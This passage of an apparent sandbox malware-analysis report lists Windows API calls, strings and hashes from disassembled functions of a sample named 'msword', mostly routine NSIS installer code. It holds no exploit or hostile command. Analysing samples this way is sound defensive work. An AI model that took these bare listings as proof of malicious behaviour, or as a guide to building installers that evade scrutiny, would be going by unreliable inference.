                                                                        • Opcode Fuzzy Hash: 222e44079ed98782fbb34ec8da515d99173e785f6e02dcb26c66960398e67004
                                                                        • Instruction Fuzzy Hash: 09026CB0900209AFEF209FA4CD45AAE7BB5FB84314F10413AF615B62E1D7B89D91DF58
                                                                        APIs
                                                                        • GetDlgItem.USER32(?,000003F0), ref: 004044F9
                                                                        • IsDlgButtonChecked.USER32(?,000003F0), ref: 00404507
                                                                        • GetDlgItem.USER32(?,000003FB), ref: 00404527
                                                                        • GetAsyncKeyState.USER32(00000010), ref: 0040452E
                                                                        • GetDlgItem.USER32(?,000003F0), ref: 00404543
                                                                        • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404554
                                                                        • SetWindowTextW.USER32(?,?), ref: 00404583
                                                                        • SHBrowseForFolderW.SHELL32(?), ref: 0040463D
                                                                        • lstrcmpiW.KERNEL32(00462540,00447240,00000000,?,?), ref: 0040467A
                                                                        • lstrcatW.KERNEL32(?,00462540), ref: 00404686
                                                                        • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404696
                                                                        • CoTaskMemFree.OLE32(00000000), ref: 00404648
                                                                          • Part of subcall function 00405C84: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403F81), ref: 00405C97
                                                                          • Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                                          • Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                                          • Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                                          • Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                                          • Part of subcall function 00403E74: lstrcatW.KERNEL32(00000000,00000000,0046A560,004C70A8,install.log,00405A9C,004C70A8,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006), ref: 00403E8F
                                                                        • GetDiskFreeSpaceW.KERNEL32(00443238,?,?,0000040F,?,00443238,00443238,?,00000000,00443238,?,?,000003FB,?), ref: 00404759
                                                                        • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404774
                                                                          • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                        • SetDlgItemTextW.USER32(00000000,00000400,00409264), ref: 004047ED
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2239667617.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000F.00000002.2239639043.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239712938.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.000000000040B000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.000000000041F000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.0000000000461000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239872629.00000000004F4000.00000002.00000001.01000000.0000000C.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                                                        Similarity
                                                                        • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                                                                        • String ID: 82D$@%F$@rD$A
                                                                        • API String ID: 3347642858-1086125096
                                                                        • Opcode ID: 41223eded68e0cc8c9bf9fa9bd2dae48608aba550ad56c91da83586f0d18507e
                                                                        • Instruction ID: 5c5d6a603380bcdbc7d7d35b60f5621b43697e5e98684918e033f9398a36e476
                                                                        • Opcode Fuzzy Hash: 41223eded68e0cc8c9bf9fa9bd2dae48608aba550ad56c91da83586f0d18507e
                                                                        • Instruction Fuzzy Hash: D1B1A4B1900209BBDB11AFA1CD85AAF7AB8EF45314F10847BF605B72D1D77C8A41CB59
                                                                        APIs
                                                                        • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
                                                                        • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F30
                                                                        • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FA9
                                                                        • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FB5
                                                                        • lstrcmpA.KERNEL32(name,?), ref: 00406FC7
                                                                        • CloseHandle.KERNEL32(?), ref: 004071E6
                                                                          • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                          • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2239667617.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000F.00000002.2239639043.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239712938.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.000000000040B000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.000000000041F000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.0000000000461000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239872629.00000000004F4000.00000002.00000001.01000000.0000000C.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                                                        Similarity
                                                                        • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                                                                        • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                                                                        • API String ID: 1916479912-1189179171
                                                                        • Opcode ID: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
                                                                        • Instruction ID: 34713ba181b26839f7619e948cf229fd8716e5ee99c03f3e8673f79b0d3e70cf
                                                                        • Opcode Fuzzy Hash: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
                                                                        • Instruction Fuzzy Hash: 9091BF70D1412DAACF04EBA5DD909FEBBBAEF48301F00416AF592F72D0E6785A05DB64
                                                                        APIs
                                                                        • DeleteFileW.KERNEL32(?,?,004C30A0), ref: 00406CB8
                                                                        • lstrcatW.KERNEL32(0045C918,\*.*,0045C918,?,-00000002,004D70C8,?,004C30A0), ref: 00406D09
                                                                        • lstrcatW.KERNEL32(?,00408838,?,0045C918,?,-00000002,004D70C8,?,004C30A0), ref: 00406D29
                                                                        • lstrlenW.KERNEL32(?), ref: 00406D2C
                                                                        • FindFirstFileW.KERNEL32(0045C918,?), ref: 00406D40
                                                                        • FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E22
                                                                        • FindClose.KERNEL32(?), ref: 00406E33
                                                                        Strings
                                                                        • Delete: DeleteFile("%s"), xrefs: 00406DBC
                                                                        • \*.*, xrefs: 00406D03
                                                                        • Delete: DeleteFile failed("%s"), xrefs: 00406DFD
                                                                        • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EB0
                                                                        • RMDir: RemoveDirectory("%s"), xrefs: 00406E6F
                                                                        • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406E93
                                                                        • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E58
                                                                        • Delete: DeleteFile on Reboot("%s"), xrefs: 00406DE0
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2239667617.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000F.00000002.2239639043.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239712938.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.000000000040B000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.000000000041F000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.0000000000461000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239872629.00000000004F4000.00000002.00000001.01000000.0000000C.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                                                        Similarity
                                                                        • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                        • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*
                                                                        • API String ID: 2035342205-3294556389
                                                                        • Opcode ID: 15be8897d6e9b53d01f132332000c29bcd26e475d5c6b9324dd4f7514e94a53d
                                                                        • Instruction ID: 0ca3ec5a28b3c1cae8259a28e21d86b18febecd5c0179aed135e39ed79665852
                                                                        • Opcode Fuzzy Hash: 15be8897d6e9b53d01f132332000c29bcd26e475d5c6b9324dd4f7514e94a53d
                                                                        • Instruction Fuzzy Hash: 2D51E3315043056ADB20AB61CD46EAF37B89F81725F22803FF943751D2DB7C49A2DAAD
                                                                        APIs
                                                                        • GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                        • GetSystemDirectoryW.KERNEL32(00462540,00002004), ref: 00406958
                                                                          • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                        • GetWindowsDirectoryW.KERNEL32(00462540,00002004), ref: 0040696B
                                                                        • lstrcatW.KERNEL32(00462540,\Microsoft\Internet Explorer\Quick Launch), ref: 004069E5
                                                                        • lstrlenW.KERNEL32(00462540,0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 00406A47
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2239667617.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000F.00000002.2239639043.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239712938.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.000000000040B000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.000000000041F000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.0000000000461000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239872629.00000000004F4000.00000002.00000001.01000000.0000000C.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                                                        Similarity
                                                                        • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                                                                        • String ID: @%F$@%F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                        • API String ID: 3581403547-784952888
                                                                        • Opcode ID: 5b9b76f287d52b653a8a41dc6b1224aada0ccbd74d66441f1f03372adecf381e
                                                                        • Instruction ID: 7881bd453c5698e0e02013fa1c3524f2cf467b60749c67c5a59258f73e57ab2a
                                                                        • Opcode Fuzzy Hash: 5b9b76f287d52b653a8a41dc6b1224aada0ccbd74d66441f1f03372adecf381e
                                                                        • Instruction Fuzzy Hash: F171F4B1A00215ABDB20AF28CD44A7E3771EF55314F12C03FE906B62E0E77C89A19B5D
                                                                        APIs
                                                                        • CoCreateInstance.OLE32(00409B24,?,00000001,00409B04,?), ref: 0040257E
                                                                        Strings
                                                                        • CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2239667617.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000F.00000002.2239639043.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239712938.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.000000000040B000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.000000000041F000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.0000000000461000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239872629.00000000004F4000.00000002.00000001.01000000.0000000C.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                                                        Similarity
                                                                        • API ID: CreateInstance
                                                                        • String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
                                                                        • API String ID: 542301482-1377821865
                                                                        • Opcode ID: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
                                                                        • Instruction ID: c24c797a6f187c751e7d972b1a807078ee58ffeb38f484aa28d094541f0f6205
                                                                        • Opcode Fuzzy Hash: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
                                                                        • Instruction Fuzzy Hash: 02415E74A00205BFCF04EFA0CC99EAE7B79FF48314B20456AF915EB2E1C679A941CB54
                                                                        APIs
                                                                        • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402E27
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2239667617.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000F.00000002.2239639043.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239712938.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.000000000040B000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.000000000041F000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.0000000000461000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239872629.00000000004F4000.00000002.00000001.01000000.0000000C.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                                                        Similarity
                                                                        • API ID: FileFindFirst
                                                                        • String ID:
                                                                        • API String ID: 1974802433-0
                                                                        • Opcode ID: 005be0a9498432eb51f9697d6085e84733c01c19a866f8c94ce5140aa3afdc34
                                                                        • Instruction ID: b91193b5dd17d351e639dca097a4c2443a83fae7855d8014906372cda19badf2
                                                                        • Opcode Fuzzy Hash: 005be0a9498432eb51f9697d6085e84733c01c19a866f8c94ce5140aa3afdc34
                                                                        • Instruction Fuzzy Hash: 4EE06D32600204AFD700EB749D45ABE736CDF01329F20457BF146F20D1E6B89A41976A
                                                                        APIs
                                                                        • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063BF
                                                                        • lstrlenW.KERNEL32(?), ref: 004063CC
                                                                        • GetVersionExW.KERNEL32(?), ref: 0040642A
                                                                          • Part of subcall function 0040602B: CharUpperW.USER32(?,00406401,?), ref: 00406031
                                                                        • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406469
                                                                        • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00406488
                                                                        • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00406492
                                                                        • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040649D
                                                                        • FreeLibrary.KERNEL32(00000000), ref: 004064D4
                                                                        • GlobalFree.KERNEL32(?), ref: 004064DD
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2239667617.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000F.00000002.2239639043.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239712938.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.000000000040B000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.000000000041F000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.0000000000461000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239872629.00000000004F4000.00000002.00000001.01000000.0000000C.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                                                        Similarity
                                                                        • API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
                                                                        • String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
                                                                        • API String ID: 20674999-2124804629
                                                                        • Opcode ID: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
                                                                        • Instruction ID: f5db07f83b48746be4b9c4f5c588c21b75103c60b5638216cabcef37c42edb4d
                                                                        • Opcode Fuzzy Hash: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
                                                                        • Instruction Fuzzy Hash: 38919331900219EBDF109FA4CD88AAFBBB8EF44741F11447BE546F6281DB388A51CF68
                                                                        APIs
                                                                        • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040416D
                                                                        • GetDlgItem.USER32(?,000003E8), ref: 00404181
                                                                        • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040419E
                                                                        • GetSysColor.USER32(?), ref: 004041AF
                                                                        • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041BD
                                                                        • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041CB
                                                                        • lstrlenW.KERNEL32(?), ref: 004041D6
                                                                        • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004041E3
                                                                        • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004041F2
                                                                          • Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404124,?), ref: 00403FE1
                                                                          • Part of subcall function 00403FCA: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404124,?), ref: 00403FF0
                                                                          • Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404124,?), ref: 00404004
                                                                        • GetDlgItem.USER32(?,0000040A), ref: 0040424A
                                                                        • SendMessageW.USER32(00000000), ref: 00404251
                                                                        • GetDlgItem.USER32(?,000003E8), ref: 0040427E
                                                                        • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042C1
                                                                        • LoadCursorW.USER32(00000000,00007F02), ref: 004042CF
                                                                        • SetCursor.USER32(00000000), ref: 004042D2
                                                                        • ShellExecuteW.SHELL32(0000070B,open,00462540,00000000,00000000,00000001), ref: 004042E7
                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 004042F3
                                                                        • SetCursor.USER32(00000000), ref: 004042F6
                                                                        • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404325
                                                                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404337
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2239667617.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000F.00000002.2239639043.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239712938.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.000000000040B000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.000000000041F000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.0000000000461000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239872629.00000000004F4000.00000002.00000001.01000000.0000000C.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
                                                                        • String ID: @%F$N$open
                                                                        • API String ID: 3928313111-3849437375
                                                                        • Opcode ID: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
                                                                        • Instruction ID: 2c1438ad93098d7b112eeb2502b55652a68651cb38e922ac8f4fb42b83a973d4
                                                                        • Opcode Fuzzy Hash: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
                                                                        • Instruction Fuzzy Hash: 0F71A4B1900609FFDB109F60DD45EAA7B79FB44305F00843AFA05B62D1C778A991CF99
                                                                        APIs
                                                                        • lstrcpyW.KERNEL32(0045B2C8,NUL,?,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AA9
                                                                        • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AC8
                                                                        • GetShortPathNameW.KERNEL32(000000F1,0045B2C8,00000400), ref: 00406AD1
                                                                          • Part of subcall function 00405DB6: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
                                                                          • Part of subcall function 00405DB6: lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8
                                                                        • GetShortPathNameW.KERNEL32(000000F1,00460920,00000400), ref: 00406AF2
                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,0045B2C8,000000FF,0045BAC8,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B1B
                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00460920,000000FF,0045C118,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B33
                                                                        • wsprintfA.USER32 ref: 00406B4D
                                                                        • GetFileSize.KERNEL32(00000000,00000000,00460920,C0000000,00000004,00460920,?,?,00000000,000000F1,?), ref: 00406B85
                                                                        • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406B94
                                                                        • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BB0
                                                                        • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406BE0
                                                                        • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,0045C518,00000000,-0000000A,0040987C,00000000,[Rename]), ref: 00406C37
                                                                          • Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                                          • Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                                        • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C4B
                                                                        • GlobalFree.KERNEL32(00000000), ref: 00406C52
                                                                        • CloseHandle.KERNEL32(?), ref: 00406C5C
                                                                        Strings
                                                                        Similarity
                                                                        • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                                                        • String ID: F$%s=%s$NUL$[Rename]
                                                                        • API String ID: 565278875-1653569448
                                                                        • Opcode ID: a83451b5c4aab99109613fb463f01f18261c5de4d9c28115f8397278e7cafe6e
                                                                        • Instruction ID: f97e154d5ee7f709bd30e138c0dd6e282719408add8f0d739c14b832633f1bd9
                                                                        • Opcode Fuzzy Hash: a83451b5c4aab99109613fb463f01f18261c5de4d9c28115f8397278e7cafe6e
                                                                        • Instruction Fuzzy Hash: AE412632104208BFE6206B619E8CD6B3B6CDF86754B16043EF586F22D1DA3CDC158ABC
                                                                        APIs
                                                                        • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                        • BeginPaint.USER32(?,?), ref: 00401047
                                                                        • GetClientRect.USER32(?,?), ref: 0040105B
                                                                        • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                                                        • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                                                        • DeleteObject.GDI32(?), ref: 004010F6
                                                                        • CreateFontIndirectW.GDI32(?), ref: 0040110E
                                                                        • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                                                        • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                                                        • SelectObject.GDI32(00000000,?), ref: 00401149
                                                                        • DrawTextW.USER32(00000000,0046ADC0,000000FF,00000010,00000820), ref: 0040115F
                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                                                        • DeleteObject.GDI32(?), ref: 0040116E
                                                                        • EndPaint.USER32(?,?), ref: 00401177
                                                                        Strings
                                                                        Similarity
                                                                        • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                        • String ID: F
                                                                        • API String ID: 941294808-1304234792
                                                                        • Opcode ID: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
                                                                        • Instruction ID: e7530e13063599d95e155ed3b2c7b7521dfa2668d538c4695d9c695e9582dc0d
                                                                        • Opcode Fuzzy Hash: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
                                                                        • Instruction Fuzzy Hash: 01516C71400209AFCB058F95DE459AF7FB9FF45311F00802EF992AA1A0CB78DA55DFA4
                                                                        APIs
                                                                        • RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
                                                                        • lstrlenW.KERNEL32(004130D8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
                                                                        • RegSetValueExW.ADVAPI32(?,?,?,?,004130D8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
                                                                        • RegCloseKey.ADVAPI32(?), ref: 004029E4
                                                                          • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                          • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                        Strings
                                                                        • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                                                                        • WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
                                                                        • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
                                                                        • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
                                                                        • WriteReg: error creating key "%s\%s", xrefs: 004029F5
                                                                        • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
                                                                        Similarity
                                                                        • API ID: lstrlen$CloseCreateValuewvsprintf
                                                                        • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                                                                        • API String ID: 1641139501-220328614
                                                                        • Opcode ID: 51d35262b0c2a2c9e21de093e360e43a16013741a0d7e0050a8341ec78c57d1d
                                                                        • Instruction ID: 4ea7a0066738be70411365ddd6f3e5606018e51d84950e7919a1ab5782edcef9
                                                                        • Opcode Fuzzy Hash: 51d35262b0c2a2c9e21de093e360e43a16013741a0d7e0050a8341ec78c57d1d
                                                                        • Instruction Fuzzy Hash: 3D41BFB2D00209BFDF11AF90CE46DAEBBB9EB04704F20407BF505B61A1D6B94B509B59
                                                                        APIs
                                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
                                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
                                                                        • GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
                                                                        • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
                                                                        • GlobalFree.KERNEL32(00000000), ref: 00402F17
                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
                                                                        • DeleteFileW.KERNEL32(?), ref: 00402F56
                                                                        Strings
                                                                        • created uninstaller: %d, "%s", xrefs: 00402F3B
                                                                        Similarity
                                                                        • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                        • String ID: created uninstaller: %d, "%s"
